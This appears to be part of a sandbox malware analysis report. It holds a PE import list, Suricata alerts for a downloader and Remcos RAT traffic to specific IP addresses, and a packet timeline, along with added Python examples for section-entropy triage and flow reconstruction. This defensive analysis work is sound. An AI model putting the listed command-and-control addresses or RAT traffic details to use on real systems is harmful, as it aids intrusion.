KERNEL32.dll | lstrcmpiA, CreateFileW, GetTempFileNameW, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, WriteFile, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, SetEnvironmentVariableW
Language of compilation system | Country where language is spoken | Map
English | United States |
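The section table above carries three columns that do most of the triage work: MD5, Entropy and ZLIB Complexity. The `.ndata` row shows why they belong together: its raw size is 0, so its MD5 is the MD5 of empty input (d41d8cd98f00b204e9800998ecf8427e), its entropy is 0.0 and its ZLIB complexity is 0. The added Python below (example code, not Joe Sandbox's implementation) recomputes those columns from raw section bytes and derives a few triage findings from them together with the IMAGE_SCN_* characteristics. It assumes that "ZLIB Complexity" means compressed size divided by raw size; the sample sections are constructed (their sizes mirror the table, their bytes do not), and the `.pat` section is there to show that entropy alone is fooled by structured data, which is why a packed-code verdict needs both a high entropy and a near-incompressible byte stream.

```python
"""Recompute a sandbox-style PE section table and derive triage findings.

Added example, not Joe Sandbox code. The 'ZLIB Complexity' definition
(compressed size / raw size) is an assumption about the report's column.
"""
import hashlib
import math
import zlib
from dataclasses import dataclass

# IMAGE_SCN_* bits from the PE/COFF specification (only the ones in the table).
SCN_FLAGS = {
    "IMAGE_SCN_CNT_CODE": 0x00000020,
    "IMAGE_SCN_CNT_INITIALIZED_DATA": 0x00000040,
    "IMAGE_SCN_CNT_UNINITIALIZED_DATA": 0x00000080,
    "IMAGE_SCN_MEM_EXECUTE": 0x20000000,
    "IMAGE_SCN_MEM_READ": 0x40000000,
    "IMAGE_SCN_MEM_WRITE": 0x80000000,
}
EXECUTE = SCN_FLAGS["IMAGE_SCN_MEM_EXECUTE"]
WRITE = SCN_FLAGS["IMAGE_SCN_MEM_WRITE"]


def shannon_entropy(data: bytes) -> float:
    """Bits per byte in [0, 8]; 0.0 for an empty section, as the report shows for .ndata."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def zlib_complexity(data: bytes) -> float:
    """Assumed definition of the report's ZLIB Complexity: compressed size / raw size."""
    if not data:
        return 0.0
    return len(zlib.compress(data, 9)) / len(data)


@dataclass(frozen=True)
class Section:
    name: str
    virtual_size: int
    raw_data: bytes
    characteristics: frozenset  # IMAGE_SCN_* names exactly as printed in the report


def analyse_section(sec: Section) -> dict:
    flags = 0
    for name in sec.characteristics:
        flags |= SCN_FLAGS[name]
    ent = shannon_entropy(sec.raw_data)
    ratio = zlib_complexity(sec.raw_data)
    findings = []
    if flags & EXECUTE and flags & WRITE:
        findings.append("RWX")            # writable code: typical of self-modifying unpacker stubs
    # Packed or encrypted code has BOTH high entropy and near-incompressible bytes;
    # entropy alone is fooled by structured data such as the '.pat' sample below.
    if flags & EXECUTE and ent > 7.0 and ratio > 0.9:
        findings.append("packed-code")
    if not sec.raw_data and sec.virtual_size:
        findings.append("no-raw-data")    # uninitialised section; NSIS's .ndata looks like this
    return {
        "name": sec.name,
        "raw_size": len(sec.raw_data),
        "virtual_size": sec.virtual_size,
        "md5": hashlib.md5(sec.raw_data).hexdigest(),
        "entropy": round(ent, 4),
        "zlib_complexity": round(ratio, 4),
        "findings": findings,
    }


def analyse_sections(sections) -> list:
    return [analyse_section(s) for s in sections]


def _pseudo_random(n: int) -> bytes:
    """Deterministic stand-in for encrypted payload bytes (constructed test data)."""
    blocks = (hashlib.sha256(b"section-demo" + i.to_bytes(4, "little")).digest()
              for i in range(n // 32 + 1))
    return b"".join(blocks)[:n]


# Constructed sample sections: sizes mirror the table above, the bytes do not.
SAMPLE_SECTIONS = [
    Section(".text", 0x6576, _pseudo_random(0x6600),
            frozenset({"IMAGE_SCN_CNT_CODE", "IMAGE_SCN_MEM_EXECUTE", "IMAGE_SCN_MEM_READ"})),
    Section(".pat", 0x4000, bytes(range(256)) * 64,   # entropy 8.0 yet highly compressible
            frozenset({"IMAGE_SCN_CNT_CODE", "IMAGE_SCN_MEM_EXECUTE", "IMAGE_SCN_MEM_READ"})),
    Section(".rdata", 0x1358, b"Software\\Microsoft\\Windows\\CurrentVersion\\Run\0" * 100,
            frozenset({"IMAGE_SCN_CNT_INITIALIZED_DATA", "IMAGE_SCN_MEM_READ"})),
    Section(".ndata", 0x23000, b"",
            frozenset({"IMAGE_SCN_CNT_UNINITIALIZED_DATA", "IMAGE_SCN_MEM_READ", "IMAGE_SCN_MEM_WRITE"})),
    Section(".rwx", 0x1000, _pseudo_random(0x1000),
            frozenset({"IMAGE_SCN_CNT_CODE", "IMAGE_SCN_MEM_EXECUTE", "IMAGE_SCN_MEM_READ",
                       "IMAGE_SCN_MEM_WRITE"})),
]

if __name__ == "__main__":
    for row in analyse_sections(SAMPLE_SECTIONS):
        print(row)
```

To run this against a real file, feed `pefile`'s `section.get_data()` and the `IMAGE_SCN_*` names of each `section.Characteristics` into `Section`; the thresholds (7.0 bits, 0.9 ratio) are starting points for triage, not hard rules.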
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-10T13:52:56.311136+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.5 | 49922 | 212.162.149.89 | 80 | TCP
2024-12-10T13:52:59.770777+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.5 | 49933 | 212.162.149.91 | 2404 | TCP
2024-12-10T13:53:01.890405+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.5 | 49939 | 212.162.149.91 | 2404 | TCP
2024-12-10T13:53:02.178716+0100 | 2803304 | ETPRO MALWARE Common Downloader Header Pattern HCa | 3 | 192.168.2.5 | 49940 | 178.237.33.50 | 80 | TCP
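The Suricata alerts above are keyed on a 5-tuple, while the per-packet timeline that follows lists each packet in whichever direction it travelled. To answer "which flow did the downloader pattern fire on, how many packets did it carry and how long was it open", the two have to be joined after folding both packet directions onto one flow key. The added Python below (example code, not Joe Sandbox's or Suricata's) does that: it normalises each packet onto a client/server key, counts packets per direction, keeps first/last timestamps, attaches alerts to their flow and orders flows for triage by the worst Suricata severity (1 is the most severe). The packet and alert rows are constructed from the first rows of the 49922 flow and three of the alerts in this report; the "higher port is the client" rule is an assumption that holds for these rows.

```python
"""Flow reconstruction over a sandbox packet timeline, joined with IDS alerts.

Added example, not Joe Sandbox or Suricata code. Rows are constructed from a
handful of the report's packet and alert rows; the client/server heuristic
(higher port is the client) is an assumption that holds for this capture.
"""
from collections import defaultdict
from dataclasses import dataclass, field
from datetime import datetime
from typing import Optional


@dataclass(frozen=True)
class FlowKey:
    client: str
    client_port: int
    server: str
    server_port: int


def flow_key(src: str, sport: int, dst: str, dport: int) -> FlowKey:
    """Fold both packet directions onto one key (assumption: higher port = client)."""
    if sport >= dport:
        return FlowKey(src, sport, dst, dport)
    return FlowKey(dst, dport, src, sport)


def parse_ts(s: str) -> datetime:
    """'Dec 10, 2024 13:52:55.029892921 CET' -> naive datetime (ns truncated to us, zone dropped)."""
    body, _zone = s.rsplit(" ", 1)
    main, frac = body.split(".")
    return datetime.strptime(main, "%b %d, %Y %H:%M:%S").replace(microsecond=int(frac[:6]))


@dataclass
class Flow:
    client_to_server: int = 0
    server_to_client: int = 0
    first: Optional[datetime] = None
    last: Optional[datetime] = None
    alerts: list = field(default_factory=list)   # (sid, severity, signature)


def summarize_flows(packets, alerts) -> dict:
    flows = defaultdict(Flow)
    for ts, sport, dport, src, dst in packets:
        key = flow_key(src, sport, dst, dport)
        f = flows[key]
        if src == key.client:
            f.client_to_server += 1
        else:
            f.server_to_client += 1
        t = parse_ts(ts)
        f.first = t if f.first is None or t < f.first else f.first
        f.last = t if f.last is None or t > f.last else f.last
    # An alert whose flow has no packets in the excerpt still gets its own entry,
    # so alert-only flows are visible rather than silently dropped.
    for _ts, sid, sig, sev, src, sport, dst, dport, _proto in alerts:
        flows[flow_key(src, sport, dst, dport)].alerts.append((sid, sev, sig))
    return dict(flows)


def triage_order(flows: dict) -> list:
    """Flows to look at first: lowest Suricata severity number (1 = worst), then most packets."""
    def rank(item):
        _key, f = item
        worst = min((sev for _sid, sev, _sig in f.alerts), default=99)
        return (worst, -(f.client_to_server + f.server_to_client))
    return [key for key, _f in sorted(flows.items(), key=rank)]


# Constructed from the report's timeline (first six packets of the 49922 flow) and alert tables.
PACKETS = [
    ("Dec 10, 2024 13:52:55.029892921 CET", 49922, 80, "192.168.2.5", "212.162.149.89"),
    ("Dec 10, 2024 13:52:55.149224043 CET", 80, 49922, "212.162.149.89", "192.168.2.5"),
    ("Dec 10, 2024 13:52:55.149346113 CET", 49922, 80, "192.168.2.5", "212.162.149.89"),
    ("Dec 10, 2024 13:52:55.150271893 CET", 49922, 80, "192.168.2.5", "212.162.149.89"),
    ("Dec 10, 2024 13:52:55.269686937 CET", 80, 49922, "212.162.149.89", "192.168.2.5"),
    ("Dec 10, 2024 13:52:56.311058044 CET", 80, 49922, "212.162.149.89", "192.168.2.5"),
]
ALERTS = [
    ("2024-12-10T13:52:56.311136+0100", 2803270, "ETPRO MALWARE Common Downloader Header Pattern UHCa",
     2, "192.168.2.5", 49922, "212.162.149.89", 80, "TCP"),
    ("2024-12-10T13:52:59.770777+0100", 2036594, "ET JA3 Hash - Remcos 3.x/4.x TLS Connection",
     1, "192.168.2.5", 49933, "212.162.149.91", 2404, "TCP"),
    ("2024-12-10T13:53:02.178716+0100", 2803304, "ETPRO MALWARE Common Downloader Header Pattern HCa",
     3, "192.168.2.5", 49940, "178.237.33.50", 80, "TCP"),
]

if __name__ == "__main__":
    flows = summarize_flows(PACKETS, ALERTS)
    for key in triage_order(flows):
        f = flows[key]
        print(key, f.client_to_server, f.server_to_client, f.first, f.last, [a[0] for a in f.alerts])
```

The Remcos JA3 flow sorts first because its severity is 1 even though none of its packets are in the excerpt; on the full timeline the same join tells you how much the RAT session exchanged with 212.162.149.91 versus the two HTTP downloader flows.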
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 10, 2024 13:52:55.029892921 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
Dec 10, 2024 13:52:55.149224043 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:55.149346113 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
Dec 10, 2024 13:52:55.150271893 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
Dec 10, 2024 13:52:55.269686937 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.311058044 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.311099052 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.311110973 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.311136007 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
Dec 10, 2024 13:52:56.311157942 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
Dec 10, 2024 13:52:56.311240911 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.311253071 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.311285019 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
Dec 10, 2024 13:52:56.350718021 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.350734949 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.350748062 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.350778103 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
Dec 10, 2024 13:52:56.350797892 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
Dec 10, 2024 13:52:56.350837946 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.350850105 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.350879908 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
Dec 10, 2024 13:52:56.431345940 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.431427956 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
Dec 10, 2024 13:52:56.431658983 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.431706905 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
Dec 10, 2024 13:52:56.434822083 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.434866905 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
Dec 10, 2024 13:52:56.503042936 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.503103971 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
Dec 10, 2024 13:52:56.503132105 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.503171921 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
Dec 10, 2024 13:52:56.507191896 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.507251024 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
Dec 10, 2024 13:52:56.509043932 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.509090900 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
Dec 10, 2024 13:52:56.509150982 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.509188890 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
Dec 10, 2024 13:52:56.517129898 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.517191887 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
Dec 10, 2024 13:52:56.517224073 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.517267942 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
Dec 10, 2024 13:52:56.525543928 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.525590897 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
Dec 10, 2024 13:52:56.525633097 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.525671959 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
Dec 10, 2024 13:52:56.533941031 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.533989906 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
Dec 10, 2024 13:52:56.534018993 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.534060955 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
Dec 10, 2024 13:52:56.542723894 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.542769909 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
Dec 10, 2024 13:52:56.542869091 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.542917967 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
Dec 10, 2024 13:52:56.546956062 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.547003031 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
Dec 10, 2024 13:52:56.547024012 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.547063112 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
Dec 10, 2024 13:52:56.555206060 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.555253029 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
Dec 10, 2024 13:52:56.558382034 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.558437109 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
Dec 10, 2024 13:52:56.558465004 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.558532953 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
Dec 10, 2024 13:52:56.566641092 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.566699028 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
Dec 10, 2024 13:52:56.566766977 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.566806078 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
Dec 10, 2024 13:52:56.574343920 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.574457884 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.574521065 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
Dec 10, 2024 13:52:56.581944942 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.582017899 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
Dec 10, 2024 13:52:56.627471924 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.627582073 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.627626896 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
Dec 10, 2024 13:52:56.695317984 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.695349932 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.695420980 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
Dec 10, 2024 13:52:56.697412014 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.697463036 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
Dec 10, 2024 13:52:56.697518110 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.697560072 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
Dec 10, 2024 13:52:56.701854944 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.703479052 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.703527927 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
Dec 10, 2024 13:52:56.703615904 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.703663111 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
Dec 10, 2024 13:52:56.707990885 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.708098888 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.708149910 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
Dec 10, 2024 13:52:56.712403059 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.712503910 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.712538958 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
Dec 10, 2024 13:52:56.712538958 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
Dec 10, 2024 13:52:56.716844082 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.716901064 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
Dec 10, 2024 13:52:56.716953039 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.716988087 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
Dec 10, 2024 13:52:56.721281052 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.721335888 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
Dec 10, 2024 13:52:56.721384048 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.721422911 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
Dec 10, 2024 13:52:56.725725889 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.725815058 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.725860119 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
Dec 10, 2024 13:52:56.730214119 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.730324984 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.730376959 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
Dec 10, 2024 13:52:56.734561920 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.734966993 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.735014915 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
Dec 10, 2024 13:52:56.735086918 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.735127926 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
Dec 10, 2024 13:52:56.739696980 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.740045071 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.740097046 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
Dec 10, 2024 13:52:56.743895054 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.743937969 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.743989944 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
Dec 10, 2024 13:52:56.748368025 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.748454094 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.748507977 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
Dec 10, 2024 13:52:56.752810955 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.752943039 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.753006935 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
Dec 10, 2024 13:52:56.757286072 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.757329941 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.757380962 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
Dec 10, 2024 13:52:56.760879040 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.761092901 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.761149883 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
Dec 10, 2024 13:52:56.764491081 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.764568090 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.764624119 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
Dec 10, 2024 13:52:56.768088102 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.768205881 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.768255949 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
Dec 10, 2024 13:52:56.771723032 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.771822929 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.771869898 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
Dec 10, 2024 13:52:56.775362968 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.775449038 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.775507927 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
Dec 10, 2024 13:52:56.779268026 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.779535055 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.779584885 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
Dec 10, 2024 13:52:56.782643080 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.782696962 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.782747030 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
Dec 10, 2024 13:52:56.887499094 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.887660027 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.887725115 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
Dec 10, 2024 13:52:56.888863087 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.888910055 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.888919115 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
Dec 10, 2024 13:52:56.888952017 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
Dec 10, 2024 13:52:56.891505957 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.891575098 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.891627073 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
Dec 10, 2024 13:52:56.894174099 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.894222975 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
Dec 10, 2024 13:52:56.894294977 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.894344091 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
Dec 10, 2024 13:52:56.897150993 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.897279024 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.897334099 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
Dec 10, 2024 13:52:56.899496078 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.899533987 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.899590969 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
Dec 10, 2024 13:52:56.901803017 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.901875019 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.901931047 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
Dec 10, 2024 13:52:56.904258966 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.904320955 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
Dec 10, 2024 13:52:56.904398918 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.904443026 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
Dec 10, 2024 13:52:56.906737089 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.907030106 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.907078981 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
Dec 10, 2024 13:52:56.909090996 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.909128904 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.909148932 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
Dec 10, 2024 13:52:56.909182072 CET | 49922 | 80 | 192.168.2.5 | 212.162.149.89
Dec 10, 2024 13:52:56.911485910 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
Dec 10, 2024 13:52:56.911607027 CET | 80 | 49922 | 212.162.149.89 | 192.168.2.5
